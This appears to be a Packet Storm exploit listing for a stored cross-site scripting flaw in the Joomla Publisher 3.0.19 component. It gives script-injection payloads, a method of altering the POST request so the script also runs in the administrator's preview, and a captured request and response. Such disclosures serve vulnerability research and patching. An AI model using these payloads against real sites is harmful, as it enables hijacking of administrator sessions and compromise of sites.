what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Publisher 3.0.19 Cross Site Scripting

Joomla Publisher 3.0.19 Cross Site Scripting
Posted Nov 3, 2020
Authored by Vincent666 ibn Winnie

Joomla Publisher component version 3.0.19 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | e9a9e431e0e577fc66304edff11367730b1270cafc2b252ea1602e7175791021

Joomla Publisher 3.0.19 Cross Site Scripting

Change Mirror Download
# Exploit Title: Joomla Publisher V 3.0.19 Stored XSS
# Date: 03.11.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://publisher.ijoomla.com/demo
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Blog : https://pentest.vincent.blogspot.com/
# PoC: https://pentestvincent.blogspot.com/2020/11/joomla-publisher-v-3019-stored-xss.html

Poc:

We have stored xss and stored html injection in Publisher v 3.0.19.

I put there is one interesting method in the body "Article" with Method Post.

Create article and put simple xss code :

""><script>alert("Hello")</script>

And click "submit article".

XSS code is works..

https://ijoomlademo.com/administrator/index.php?option=com_publisher&controller=articles

https://imgur.com/a/ylpLcJV

https://imgur.com/a/XHNHp4c

But it doesn't work in preview mode.

https://imgur.com/a/1BG07Mn

The administrator can check articles in preview mode. What do we do?

Let's use the addon in the firefox "HTTP Live Headers" and change our
article with the Post Method.

""><script>alert("Hello")</script><body
background="https://pbs.twimg.com/media/D_dG89lXkAAU8P4.png">

Open Http Live Headers, Edit Article, Save this and Change Post
Request and send this.

https://imgur.com/a/ogpYEGf

Let's see what we have in preview mode.

https://imgur.com/a/QvQZNNw

https://imgur.com/a/Vzjxfpd


..................................................................................
https://ijoomlademo.com/index.php/publisher/my-articles/articlesedit/core_joomla/32

Host: ijoomlademo.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0)
Gecko/20100101 Firefox/82.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 341

Origin: https://ijoomlademo.com

Connection: keep-alive

Referer: https://ijoomlademo.com/index.php/publisher/my-articles/articlesedit/core_joomla/32

Cookie: __cfduid=dbbb4e38c58b733c11296ba0adf86aee61604442214;
c1095a90cabfb304b8e3637676e86d5a=91ionv40vq50bcapv23954o6kn;
4681557252fe8ff3df4a28d60cb41dc7=lpulqnuggmo1p7cs806stm6t5s;
joomla_user_state=logged_in;
currentURI=https%3A%2F%2Fijoomlademo.com%2Findex.php%3Foption%3Dcom_community%26view%3Dfriends%26task%3DajaxAutocomplete%26allfriends%3D1

Upgrade-Insecure-Requests: 1

title=test&heading=test&cat_id=8&content=<p>""><script>alert("Hello")</script><br></p>&id=32&controller=articlesedit&option=com_publisher&editor_name=&task=store&authid=231&media=&type=core_joomla&article_id=28&mandatory_status=approved&article_status=1&edit_a=1&edit_s=approved

POST: HTTP/2.0 303 See Other

date: Tue, 03 Nov 2020 22:32:40 GMT

content-type: text/html; charset=utf-8

x-powered-by: PHP/7.2.33

p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

location: /index.php/publisher/my-articles/articlesedit/32

expires: Wed, 17 Aug 2005 00:00:00 GMT

last-modified: Tue, 03 Nov 2020 22:32:40 GMT

cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

pragma: no-cache

cf-cache-status: DYNAMIC

cf-request-id: 0631d6bb1e00000057b093c000000001

expect-ct: max-age=604800,
report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"

report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4BKJ9XaQXZogqrRC4jLDlbWNJ3lklLos6kkmngfBver4wHRDvpbqrVk89c6FtvKZHPe8wAmywNqRUdxp2zDfVbi9ajV4PStFG5DOdB7MvvA%3D"}],"group":"cf-nel","max_age":604800}

nel: {"report_to":"cf-nel","max_age":604800}

server: cloudflare

cf-ray: 5ec98d71cf160057-DME

X-Firefox-Spdy: h2

..................................................................................
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close